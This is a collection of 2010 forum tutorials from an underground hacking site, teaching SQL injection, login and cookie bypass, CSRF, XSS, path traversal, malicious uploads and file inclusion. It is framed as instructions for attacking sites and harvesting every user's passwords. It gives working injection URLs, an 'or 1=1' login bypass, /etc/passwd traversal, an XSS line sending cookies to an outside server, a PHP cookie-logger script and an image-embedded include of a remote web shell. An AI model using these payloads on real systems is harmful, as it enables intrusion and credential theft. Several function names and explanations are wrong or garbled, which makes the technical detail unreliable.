InterN0T - Underground Security Training - Web Hacking & War Games

Guide Regular SQL Injection

Starwiz — Thu, 12 Aug 2010 18:33:09 GMT

SQLi guide

First thing you need to know, is that SQL can be tricky sometimes. Even if something looks vulnerable, it isn't always, but that works the othe way around too.

There are a few different types of SQLi, they are. Regular SQLi, Blind SQLi, Advanced SQLi, Indepth SQLi, Extensive SQLi, and Deep SQLi.

Now, what ways can we use an SQLi?
Well, there are URL, Input validation boxes/forms. Those are the most common two. But it's also possible to do via XSS, RFI, LFI, and so on.

What can we gain from a successfull SQLi?
Database access.. Which is pretty much everything on the web server.

This can be both useful and dangerous. If you were a web admin, and forgot your login cradentials, you could use an SQLi exploit that you had hidden for just this, but I wouldn't recomend this. But, if a hacker were to locate this, he could use the same thing to get your password, and every password on the database.

But how does it work?
Well, I'll explain it like this.
So, lets pretend the DB(Database) is a cookie monster, and you're the person who wants some information out of the cookie monster. But, the cookie monster only gives this info to people who give him "god cookies". But, alas you don't know how to make those cookies. So, you try giving him a vanilla cookie. Well, the cookie monster is alergic to vanilla, so he says **** you. Now what? Well, you can SQLi him. How do I do this? Well, you take your vanilla cookie and some magic sprinkles to it to make it a "god cookie". Now, once the cookie monster eats this cookie, he will be under our controll. Now, we can get whatever info we want.

Now, say we want to get access to an admin page, what would we do?
Well, the first thing we would do is check if it has any sort of input validation. To do this, we could test the inputs, and hope its vulnerable, or, we could take a look at the source. Sometimes when we look at the source, and we see that the web dev was stupid. Which, works perfectly for us.

So, lets say we want to exploit this via the URL, how would we do this?
Well, we would look for a page that calls another page for info. Like, a game website.

Code:

http://gamewebsite.com/game.php?game=184

We see that, and are like. Well this could be exploitable. So, we just add a ' to the end. So, we'll assume we get an SQL error, or there is data missing from the page. Perfect, we know its vulnerable. But, now what do we do? Well, we would use the ORDER BY command to see how many columns are in the DB. To do with, we would take the original URL, and do this:

Code:

http://gamewebsite.com/game.php?game=184+ORDER+BY+10--

Another way to see if a website is vulnerable to regular SQLi without the ' at the end, is to add +ORDER+BY+99999999999999999999999999-- to the end of the url. If an error shows, its vulnerable. If not, chances are they are filtering input, and it's not vulnerable to regular SQLi.

That, would do one of two things.
1) The page would load normally.
2) We would get an error.

If we get an error, we know there are less than that many columns. If it loads normally, we keep going higher until we find an error. So say the lowest number we can get an error at is 4, well, then we know there are 3 columns, and 4 doesn't exist (which is why we got the error).

Now, onto finding the vulnerable column. Get rid of the +ORDER+BY in the URL, and replace it with +UNION+SELECT

Code:

http://gamewebsite.com/game.php?game=184+UNION+SELECT+1,2,3--

(There are 3 columns).

Once we send that, it should dispay a number on the page (it will be either 1,2,3). If no error displayed, that's okay. Some websites require you to null the value you are injecting into. So the new URL would be:

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3--

All we did was add the - before 184

So, lets assume that the page displayed a 2, that would mean that the second column is vulnerable.

Now, we need to find the SQL version. How do we do this?
Its quite simple actually. We just use the @@version command. This should return either a version 4.x or 5.x. To inject the @@version command, we would change the vulnerable column to that.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,@@version,3--

If the page loads completely normal, its alright. We sometimes need to convert the function in order for the SQL server to understand the command. This is usually the only thing that will need to be converted. But it's even rare that this needs to. So, if we didn't get the version number from the above command, then we would change it to:

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,convert(@@version using latin1),3--

And, if that even doesn't return the version, then we will also need to HEX the page.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,unhex(hex(@@version)),3--

That there, should show us the SQL version. It will either be version 4 or 5 something, like I said before.

Now, version 4 is more of a pain in the ass, or most people think. Most guides and such don't show people how to get the table names from a version 4 sql db. But, we will be. The URL will be alot longer in this case.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

That there should show the table names.. But, if it doesn't you are going to have to start guessing, which is why it's a pain in the ass..

How do we do this? well, we take our original URL and add: from *table name*

Common table names are:

Code:

tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from admin

We get an error which means it doesn't exist.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from user

We get another error..

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from admins

Still error.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from users

No error. So, we know the table users exists.

Now, we need to quess colimn names from the table we just figured out. Column names within this table would most likely be like:
first_name, last_name, email, username, password, pass, user_id
You have to use common sense in alot of this. Now we go back a few steps, and remember which column was vulnerable (2). So we replace the 2 with the column name you are hoping exists in the users table.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,first_name,3 from users

Error

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,last_name,3 from users

Error

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,address,3 from users

Error

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,username,3 from users

No error.. So we know username exists. Now, we would want to see if the password column exists to for obvious reasons.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,password,3 from users

No error. That's good. Now, lets see if we can get the email address too.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,email,3 from users

Error.. Well ****..

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,email_address,3 from users

No error, perfect.

Code:

So we can see that in the table users, we can extract the email, username, and password.

Doing it like this, will display the first line of information, which is normally the admin login. If we only wanted to get the admin's login info, we would use the contact() command. To do so, we would so womthing like:

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,contact(email,0x3a,username,0x3a,password),3 from users

The 0x3a is there, because its the hex value of a semi-colon.

That there, would show the email, username, then password of the first user on the DB.

But of course, we want more than the admin's info. We want everyones. How else would we make a good login dump. To all the info from the columns we want to, we then have to use the group_contact() command.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from users

That there would display all the emails, then usernames, then passwords of everything in the users table.

Okay, now, if instead of getting a version 4, we got version 5, we would be very happy. Because 5 is the easist one to hack.

So, we want to get the table names. This time though, we don't have to guess. The URL would look something like this when exploiting it:

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,table_name,3 from information_schema.tables

That would display the first table name. Which again, we want more. So, what do we do? We use the group_concat()

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(table_name),3 from information_schema.tables

Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

An example of this is:

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(table_name),3 from information_schema.tables+where+table_schema=database()

All the tables from the primary DB should be displayed there. Some of which could be:

Code:

About, Admin, Admins, User, Users, Affiliates, Access, Customer, etc

No, we want to extract the data from those tables. Lets assume that there was just the users table. Well, we will change the data in the vulnerable column fom table_name, to column_name

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=*Hexed table name*

So, if were were to try:

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=Users

We would get an error, because we didn't HEX the table_name at the end. So, I hex my table name: Users: 5573657273. I used Convert String To Hexadecimal Online but there are many others.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=5573657273

That there would again, give us an error, because e have to add the MYSQL Intiger right before the hex

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=0x5573657273

Then, that would display all the columns under the table name of: Users.

In this example, we will assume that first_name, last_name, email, username, password, and email are displayed. So, we would go back in the tutorial into if it was version 4, and it would be formed the same as the final command in there.

Code:

http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(email,0x3a,username,0x3a,password),3 from Users

That's about it for regular sqli.

Guide Blind SQL Injection

Starwiz — Thu, 12 Aug 2010 18:32:29 GMT

Okay, so this is my tutorial on BSQLi.. It's going to be extremely short, because for the info on how to exploit SQLi view my SQLi thread.

So, BSQLi is pretty much the same thing as SQLi, but, you have to check if it's exploitable a different way... And kinda exploit it different.

I'm going to start off by saying that BSQLi is a huge pain in the ass. And I wouldn't recomend doing it for random websites... Only those which you really want the info from.

So, to find it. You will have to prety much look for anywhere you would expect SQLi to be. And if you try and exploit it, and the code stays in the URL when you hit enter, but it's not exploitable to SQLi. Then it's exploitable by BSQLi.

Now, instead of just going until you have more than the number of collumns. With BSQLi you have to keep going up 1 by 1, until you get the error. One above, or one below will not give you the error. So you have to be careful not to miss it. An example would be:

Code:

 

www.victimsite.com/index.php?page=1'

Now, you look at that, hit enter, and nothing happens. Well ****, there goes sqli.. But.. What about Bsqli..
So, we go like:

Code:

 

www.victimsite.com/index.php?page=1 UNION SELECT 1--

Nothing.. ****.

Code:

 

www.victimsite.com/index.php?page=1 UNION SELECT 1,2--

Nothing.. ****.

Code:

 

www.victimsite.com/index.php?page=1 UNION SELECT 12,3--

Still nothing.. Over and over and over and over... And over again.

So, we finally find an error at 5.

Code:

 

www.victimsite.com/index.php?page=1 UNION SELECT 1,2,3,4,5--

That's pretty good actually. Not too many.
Then once you found the number of collumns, you have to try and find the vulnerable one... Again, you pretty much have to just go up one by one

So

Code:

 

www.victimsite.com/index.php?page=1 UNION SELECT version(),2,3,4,5--

Nope..

Code:

 

www.victimsite.com/index.php?page=1 UNION SELECT 1,version(),3,4,5--

So on so on until you get the version.. Which would mean you found the vulnerable column. Nice job. But, it's not done yet.
Now, we have to guess for the table names :\... Trying to get it from the information_schema is useless too... It wont display anything at all.. The most common tables are:

Code:

 

user, users, username, user_name, pass, password, pwd, user_pwd, admin, administrator, admin_id, admin_pass and so on

That's pretty much it. It's similar to SQLi.. Except for you have to guess everything.

Guide SQL Login Injection

Starwiz — Thu, 12 Aug 2010 18:31:55 GMT

In this tutorial, I am going to explain how to exploit an SQL Authentication vulnerability.

Reading files is possible through the login forms on a website. An example of vulnerable code is:

Code:

 

    
    $id = $_GET['id']; 

          $result = mysql_query( "SELECT name FROM members WHERE id = '$id'"); 

    ?>

If we look at the above code, we can see that it doesn't filter sql commands. Which, is most definitely a good thing if you're trying to get it. Since it doesn't filter the input, we could try and inject some SQL code into it via the "id" variable:

Code:

 

htttp://www.theirwebsite.com/login.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--

After inputing that, we should see the /etc/passwd file. But for that to work, the user needs to have permission to view the files, and magic_quotes has to be off.

It's also possible to bypass the login authentication of some forms. If the login.php file contained:

Code:

 

$postbruger = $_POST['username']; 

            $postpass = md5($_POST['password']);  

            $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")  

            or die("" . mysql_error() . "
\n");

Then it would be possible to inject an SQL statement which would log us in as the first user in the database, which is usually the admin. We could exploit this like:

Code:

 

Username:admin ' or ' 1=1 

Password:whateverthe****iwantittobe

And boom goes the dynamite, we're logged in.. Now we can have fun as most likely an admin.

Guide Account Lockout

Starwiz — Thu, 12 Aug 2010 18:31:10 GMT

Okay, so pretty much, this is an extremely short tutorial, because all I'm really doing here is explaining to you what it is and then giving an example of where it was used.. So, Account lockout attacking is when you know the UserID you want to lock out of their account, and the website you want to lock them out of has something set up so that after X wrong attempts, you cant login for 15 minutes or something.

Seems simple enough? Well, this at one point was a big problem in ebay.. But as I say this, you're probably wondering how it would matter on ebay. Well, Ebay used to be set up so that while bidding on something, it would show the highest bidders username. Which means an attacker could log off of their account, login to the account that is trying to outbid them, then fail the login enough times that it kicked them off the account, and locked it for a specific amount of time. Leaving the attacker to win the bidding because he would do that to everyone..

Simple concept, but could be extremely useful in attacking a website, or just ****ing with stuff :P.

Guide Authentication Bypass

Starwiz — Thu, 12 Aug 2010 18:30:34 GMT

So here I will show you how to bypass authentication logins.. An piece of a horibly done anything.php is:

Code:

 

     
     if ($logged==true) { 

     echo 'Logged in.'; } 

     else { 

     print 'Not logged in.'; 

     } 

     ?>

So, to exploit this, all we would really have to do would be naviate to:

Code:

 

http://www.example.com/anything.php?logged=1

and boom goes the dynamite, we're logged in... You most likely will never find something that simple to exploit, unless the web dev is ****ing retarded...

Another example through a login.php file:

Code:

 

  if ($login_ok) 

   { 

   $_SESSION['loggato'] = true; 

   echo "$txt_pass_ok
"; 

   echo"$txt_view_entry |  

   $txt_delete-$txt_edit | $txt_install 

   
"; 

   }

Well, all that really does, is check if login_okay is true, if it is, it gives us a session which is logged in. Well, that is simple to exploit...

Code:

 

http://www.example.com/login.php?login_okay=1

And, we are logged in. You will also, most likely never find something like that...

Another example of authentication bypass is through the admin cp.. Odly enough, alot of the times an admin.php file wont check to make sure a user is logged in and has permissions. Some times it just assumes you are if you are navigating through those files... A bad idea.

Exploiting this would be incredibly simple, since we could just naviate to:

Code:

 

http://www.example.com/users/admin/files.php

and we can access the admin panel.. Crazy enough.

Guide Cross Site Request Forgery

Starwiz — Thu, 12 Aug 2010 18:30:00 GMT

This is my Cross Site Request Forgery tutorial.

First off, I am going to clear up some miss-conceptions that people believe about CSRF.

XSS and CSRF aren't the same thing. They are completely different.
CSRF isn't useless. Some people don't think its a big thing, but, in reality it is.

Okay, so CSRF is a simple thing to look for, but most scanners don't know how to find them because they are unique. But, all you really need to do, is make sure you're using Firefox. Then, you are going to want to download Live HTTP headers addon for firefox.

After you have both of those, you are going to want to check the link you want to exploit. To do so, just drag your mouse over the link and see if there is anything like a logout key. For example, my logout link for carderprofit.cc is similar to:

Code:

http://c0rrupt.net/97349j43948hdh8/login.php?do=logout&logouthash=1279007725-12d0684b998c1a47e8a942c358cb003e1d0cc5f7

Now, of course I didn't post my actual link, because that would allow anyone who is reading this to make me logout.

How?

Okay, so lets say that there wasn't a logout key, for our example. So, the logout would be:

Code:

 

http://c0rrupt.net/97349j43948hdh8/login.php?do=logout

To exploit that, we would just need to put it in some image tags for a forum. Something like:

Code:

 

[img]http://c0rrupt.net/97349j43948hdh8/login.php?do=logout[/ img] (without the space)

This i just a small portion of what you can do with it... Alot of people use a bank as an example.. But frankly, you're most likely not going to find one.. But it works generally the same. You can also use it for post requests. To do so:

First, you're going to need Firefox. After Installing that, you're going to want an addon called Live HTTP Headers. So, after this, you're going to want to open up Live HTTP Headers by going into tools>Live HTTP Headers. Then, go over to the generator tab. Then, make sure Live HTTP Headers Generator tab is clean, if not, press clear. Then, you submit whatever you want them to do. Such as add you as a friend on some website, or something like that. And it should be on the top of the list, generally looking like:

Code:

 

POST /people/friends/add.php?UID=485

Sometimes though, when you copy that, it will get rid of the "?" after add.php, and the request will not work unless you add it back.. Then, you can exploit it the same as above.

This is just a basic tutorial, I plan on updating it in the future. Just figured I would write a quick tutorial so that people would know what is it.

Guide Cross Site Scripting

Starwiz — Thu, 12 Aug 2010 18:29:24 GMT

Cross site scripting allows you to insert malicious code into a website. Normally it is used for javascript, but can also be used for php and html.

For a persistent XSS attack, the user will inject the code into an input in a form. Commonly done in poorly scripted forums.

A temp XSS attack is inserted into the URL, and only executed when someone views a specific link.. An example would be like.

Code:

http://www.example.com/search.php?&searchfor=

In the previous example, I used

Code:

as an example. If the website was vulnerable to XSS, it would popup a messagebox which would say XSS.

XSS exists in almost every website that exists, just because people tend not to sanitize their form inputes.

Injecting HTML into a website via XSS would be done like:

Code:

XSS

That would just include the bold words XSS onto the webpage somehwere.

To deface a website using XSS, to insert an image you would use the code:

Code:

For a flash video:

Code:

For a looping hidden music file: 


	Code:
	

To redirect using XSS: 


	Code:
	

You can even steal cookies and fake a login using XSS. 

 

How? 

 

Well, let me show you. With a little piece of code
	Code:
	
document.location = "http://myserver.com/cookielogger.php?c="+document.cookie
That would be the XSS code. 

 

Although, if you're sending someone the link, you're going to want to encrypt the link using: http://ipchanged.com/surf.php?u=Oi8v...BocA%3D%3D&b=7 or you could use tinyurl. 

 

For the encryption, you would convert 


	Code:
	

to 


	Code:
	
3c:73:63:72:69:70:74:3e:61:6c:65:72:74:28:22:58:53:53:22:29:3c:2f:73:63:72:69:70:74:3e
But, for your browser to read it, there needs to be some commas in there. 


	Code:
	
3c,73,63,etc
The are some filters, and they are all possible to bypass. There is a cheat sheet at XSS (Cross Site Scripting) Cheat Sheet 

 

Now, since I've made it seem like you have to send the users a link, I'm going to shine some light on some of your problems. If you happen to know that this person wont click a link, you can still possibly exploit XSS. Some forms on websites, which don't filter, will post something to the website somewhere.. Such as a forum. Say someone who was less than knowledgeable tried to code their own forum... Well, they might have everything working fine. But if you were to try to add XSS into a reply, or new thread.. Or even the name. You might be able to inject your own javascript, into permanent storage.  

Keylogger.php: 


	Code:
	
 


/* 

** Kr3w's Cookie Logger 

** DemonFlyFF.com - First v15 FlyFF Private Server 

*/ 

 

$ip = $_SERVER['REMOTE_ADDR']; 

$cookie = $_GET['cookie']; 

$referer = $_SERVER['HTTP_REFERER']; 

$browser = $_SERVER['HTTP_USER_AGENT']; 

$redirect = $_GET['redirect']; 

 

$data = "IP: " . $ip . "\n" 

."Cookie: " . $cookie . "\n" 

."Referrer: " . $referer . "\n" 

."Browser: " . $browser . "\n\n"; 

 

$log = "cookies.txt"; 

@chmod($log, 0777); 

 

$f = fopen($log, 'a'); 

fwrite($f, $data); 

fclose($f); 

 

@header("Location: $redirect"); 

 

?>
I personally use an XSS shell. You can find it if you google beef xss shell. Then do it the same as the document location thang.



Guide Encoding Your Attack Strings
Starwiz — Thu, 12 Aug 2010 18:28:54 GMT
So, in this tutorial I'm going to talk about encoding your attacks incase the web devs think they're smarter than you.. Well, after reading this tutorial, they might not be.. 

 

Well, pretty much encoding your attacks is really easy, but sometimes effective.. 

If your attack doesn't work, something is being filtered... An easy way to fix this, is to go to a website that encrypts everything for you, so you can try again.. Such as: 


	Code:
	
 

http://getyourwebsitehere.com/jswb/text_to_ascii.html
That there, converts your code to ASCii.. Another one is: 


	Code:
	
 

http://ha.ckers.org/xss.html
Scroll to the bottom of that, and you're able to encrypt your code's you're sending to the website.. Simple enough, but effective. 

 

There is also something called double encoding.. It's also quite simple. 

Pretty much, we encode our string to character hex, then use an encoding string to make it slightly more encoded. 

 

An example would be: 

 


	Code:
	
 


is the string we want to encrypt. 


	Code:
	
 

< is charhex incoded to: %3C then add: %25 to the begining, and get rid of the % on the charhex: %253C 

/ is charhex incoded to: %2F then add: %25 to the begining, and get rid of the % on the charhex: %252F 

> is charhex incoded to: %3E then add: %25 to the begining, and get rid of the % on the charhex: %253E

	Code:
	
 

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
It's also pretty simple..




Guide Full Path Disclosure
Starwiz — Thu, 12 Aug 2010 18:27:46 GMT
This is my tutorial on full path disclosure. Full path Disclosure is used to get the path of file... This is commonly used for LFI... There are many ways to get this. One of which is look at the URL a website gives you: 


	Code:
	
 

http://www.example.com/undex.php?page=about
If we took that, and turned it into 


	Code:
	
 

http://www.example.com/undex.php?page[]=about
That would render the page defunct causing it to show an error: 


	Code:
	
 

Warning: opendir(Array): failed to open dir: No such file or directory in /home/example/htdocs/index.php on line 84 

Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/marijuana/index.php on line 131
Looking at that, we can see that the full path. 

 

 

Another way, is ith Null Session Cookie. A simple example of this, would be setting something in the cookie to nothing (null) 


	Code:
	
 

javascript:void(document.cookie="PHPSESSID=");
That would give us: 


	Code:
	
 

Warning: session_start() [function.session-start]: The session id contains illegal characters,  

valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
A third way to get the full path, is to make a script, that requests a page to do something over and over enough, that it overloads, and spits out an error.




Guide Insecure Cookie Handeling
Starwiz — Thu, 12 Aug 2010 18:27:12 GMT
This tutorial is how to exploit insecure cookies. 



This isn't a common vulnerability from what I've seen, but I might just be un lucky for this.. I guess we'll start with the vulnerable code:




	Code:
	
if($_POST['password'] == $thepass) {

setcookie(“admin”,”1?);

} else { die(“Login failed!”); }

………… etc ……………..

if($_COOKIE['is_user_logged']==”1?)

{ include “admin.php”; else { die(‘not logged’); }
What that does, is check if the password you've entered is the same as the password stored in the database.. If it is, it gives you a cookie: admin=1. Then, when that cookie exists, then it includes the admin.php.



So, if we wanted to bypass this, we would just have to use some browser based javascript.




	Code:
	
javascript:document.cookie = “admin=1; path=/”;
That there, would make the vulnerable code think we're an admin... But there's more.. The admin.php also does some checks :\.



Admin.php:


	Code:
	
if ($_COOKIE[PHPMYBCAdmin] == ”) {

if (!$_POST[login] == ‘login’) {

die(“Please Login:

“);

} elseif($_POST[password] == $bcadminpass) {

setcookie(“PHPMYBCAdmin”,”LOGGEDIN”, time() + 60 * 60);

header(“Location: admin.php”); } else { die(“Incorrect”); }

}
How do we bypass that? Well:




	Code:
	
javascript:document.cookie = “PHPMYBCAdmin=LOGGEDIN; path=/”;document.cookie = “1246371700; path=/”;
You're probably wondering, what is 1246371700? Well, it's the current time() echo’ed + 360...



So, by now I'm going to assume you're confused.. How are we supposed to know all of this without being able to view the php? Well, if you open up a cookie editor. (I like Add N Edit Cookies for firefox, but it's your choice. Either way, after making an incomplete login, if you open the cookie editor and type in the website you're trying to exploit, you get a bunch of stuff. Now, we look at this "stuff" which is actually the cookies the web page saves to your browser. So, we can get the above info from here.



We will use C0rrupt.net - You will be redirected shortly to doxsters. as an example, since that is where this tutorial is written for. So, since I'm logged in with my account (Starwiz, with a UID of 2) if we look in the cookie editor for the cookie with the name:


	Code:
	
bbuserid
it will have the content:


	Code:
	
2
Since my uid is 2. This would work the same for anything stored via cookies. But for forums it doesn't work the same, because the cookies also store encrypted password. But, a lot of website aren't vulnerable to this, because they implimented some SESSIONS into the login.




Guide Insecure Download.php
Starwiz — Thu, 12 Aug 2010 18:26:04 GMT
So, this is my tutorial on exploiting insecure download.php files.. 

Normally a download.php file, would check to validate the location of the file, to make sure it was within a specific folder. But, some don't, which can allow us to download different files.. 

 

Such as: 


	Code:
	
 

/etc/passwd 

config.php
Any file on the server you really wanted to..   This is a pretty short tut, since it's a simple concept.



So, how would we download files we wanted to?



Say we have a website which lets us download ebooks. And the URL to download ebooks is something like:




	Code:
	
http://www.victim.com/ebooks/download.php?file=MakeYourWebsiteSecureFromHackers.pdf
Well, lets assume that the download.php file doesn't verify location or extension of the file. We could simply change it to something like:




	Code:
	
http://www.victim.com/ebooks/ download.php?file= ../ ../ ../ ../ ../ ../ ../etc/passwd (without all the spaces)
That there, should theoretically download the passwd file. :P




Guide Insecure Permission
Starwiz — Thu, 12 Aug 2010 18:25:25 GMT
Okay, so this tutorial is on insecure permissions.. Insecure permissions is pretty much where something of importance desn't check if you have permission to access it, because the web dev idiotically didn't set any sort of check up... Let's take a look at a db_lookup file within the admincp 


	Code:
	
 

    
    // Lookup in the database 

    readfile('protected/usersdb.txt'); 

    ?>
Now, we see that we can't access the /protected/ directory due to .htaccess.. But, we are able to access  


	Code:
	
 

http://www.example.com/users/admin/admincp/db_lookup.php
If we were to navigate to that, bam, we would be able to see everything in the database.. Just like that. But, since the admincp directory isn't.. Or shouldn't be anywhere in the source, we are going to have to do some guessing to find it..  

 

Well, some admincps allow us to backup the database.. We'll assume it's phpdump.php 


	Code:
	
 

    function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {   

    $con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect");   

    $db=@mysql_select_db($dbname,$con) or die("Could not select db"); 

    .............................. etc .......................... 

     mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
Since this code has no verification of user, it doesn't check if you're the admin. Alrighty, so assuming we could magically find this file. We could go to: 


	Code:
	
 

http://www.example.com/users/admin/admincp/phpdump.php
 and download the backup.. Easy enough. 

  

 This is a really short tutorial, because there isn't really much that we can elaborate on.. It's a simple concept. But very effective if we can exploit it.




Guide Insecure Upload.php
Starwiz — Thu, 12 Aug 2010 18:24:53 GMT
Okay, so this is going to be a short tutorial on insecure upload.php files.. Because frankly, there isn't much to talk about lol.



So, an insecure upload.php file, is a file that allows you to upload whatever you want to.. So it doesn't make sure it's the proper type of file.. Such as something that you're supposed to upload a jpg in, you may be able to upload a php file.. Or a file.php%00.jpg



That works, because the %00(nullbyte) [pretty much makes the server stop loading anything after it. So, your file.php%00.jpg, is loaded by the server as a .jpg, but when it stores it it's saved as a .php.



Nullbytes, can also be used to view forbidden derectories, text files, sql files.. Such as doing it in a directory traversal.



Yeah, that's about all I can think of right now on this topic. But i'll be sure to update it when I can think of more.




Guide Local File Inclusion
Starwiz — Thu, 12 Aug 2010 18:22:41 GMT
Local file inclusion is when you upload a file to a server, then run the file with the permissions of the web server. Most of the time when you upload something it will be in the format of an image file, such as an avatar.. After that, you execute the avatar, which you've hidden some php inside. 

 

First thing we are going to want to do is download hex workshop or some other hex editor that allows us to add our own bytes. In hex editor all you have to do is open the image you want to use as an avatar, go to the end of the file, and add some php code. 

 


	Code:
	
 


include "http://flyleaf.co.cc/Shell/GNY%20Shell.txt?"; 

?>
We're using a .txt file, because if it were a php file, the server we're attacking wouldn't be able to see the contents, and it wouldn't work.. But it still executes as a php file, don't worry about that. 

So, after we have that code in our image, we upload it to the server. After that, we need to try and create some sort of an error in the website to get the local path of our image. Such as 


	Code:
	
 

/users/~Me/public_html/forum/images/avatars/lolawesomestuff.jpg.
There are a few ways to create an error in a php file. If the file accepts input, we could try and close off the input and add some random code that does nothing (Just an idea, not sure if it works lol).  After inputing that, we can hit enter and cause it to give us an error. It will say something like: 

Error in /users/~Me/public_html/forum/uploads/input.php on line 32 

We could also generate a mysql error. Which would be completed by opening a ton of threads which are refreshing instantly. This would cause more connections than allowed by the DB. Which should display an error for us. 

 

I've got a section for creating errors, this is simple some examples.  

 

So, we could then right click on our image and copy image location. Paste it into a text edior.  


	Code:
	
 

http://victim.com/forum/images/avatar/lolawesomestuff.jpg
So, we would look at that and the error we generated in our php file, and put two and two together. 

 


	Code:
	
 

/users/~Me/public_html/forum/images/avatar/lolawesomestuff.jpg
I got that, because I look the location I got from the error, and used logic to put it together with the location of the image on the website. 

 

After that, we would need to find a way to get the web server to execute it. (Since it has our php file in it). 

This part isn't too hard, just look around for a URL that calls upon another page. Such as: 


	Code:
	
 

http://victim.com/forum/index.php?page=discussion
Well, perfect. Now, we take this and the link we've saved and put them together. Like: 

 


	Code:
	
 

http://victim.com/forum/index.php?page=/users/~Me/public_html/forum/images/avatar/lolawesomestuff.jpg?
That would execute our jpg file, which in turn would execute the php file inside of the image, which, would include our shell to the website. 

 

Now, to execute our shell, we would be able to just navagate to: 


	Code:
	
 

http://victim.com/forum/images/avatar/c99.php
I believe that that is the URL we would have to use.. If not, it would be: 


	Code:
	
 

http://victim.com/forum/index.php?page=/users/~Me/public_html/forum/images/avatar/c99.php
But I'm pretty sure it's the first one.. 

 

That would upload our shell. Which is pretty much the point of LFI.




Guide Parameter Delimination
Starwiz — Thu, 12 Aug 2010 18:21:00 GMT
This attack is based on the manipulation of parameter delimiters used by web app inputs to bypass access controlls, or authorization.. 

 

So, within some poorly written php files, it will store user permissions such as: 

 


	Code:
	
 


Starwiz|12345678|Starwiz@awesome.com|admin| 

Miind|12345678|Miind@awesome.com|user| 

Mulciber|87654321|Mulciber@awesome.com|user| 

?>
Now, Starwiz is a legit admin, and Miind and Mulciber and trying to hack my site. So, they happen to guess to try this attack. 

 

Well, where they would input their emails, Miind tries to change his email to: 


	Code:
	
 

Miind@awesome.com|admin|
And he saves it.. Well, accoring to my php file, it would now be like. 


	Code:
	
 


Starwiz|12345678|Starwiz@awesome.com|admin| 

Miind|12345678|Miind@awesome.com|admin||user| 

Mulciber|87654321|Mulciber@awesome.com|user| 

?>
But, lets say that I added some security by making it check that every line is the proper length, and if not, it would revert that line to a previous one.. Well, Miind tells Mulciber, and Mulciber gets a new idea, using the same method. So, he changes his email to: 

 


	Code:
	
 

Mulciber@awesome.com|admin| \n NotAHacker|487654321|Awesome@lol****you.com|user|
That, would change my crapy php file to: 


	Code:
	
 


Starwiz|12345678|Starwiz@awesome.com|admin| 

Miind|12345678|Miind@awesome.com|user| 

Mulciber|87654321|Mulciber@awesome.com|admin| 

NotAHacker|487654321|Awesome@lol****you.com|user| 

?>
Using the \n line, it should Make the php file add everything after \n to a new line. 

 

Now, Mulciber has admin, and can do whatever he wants.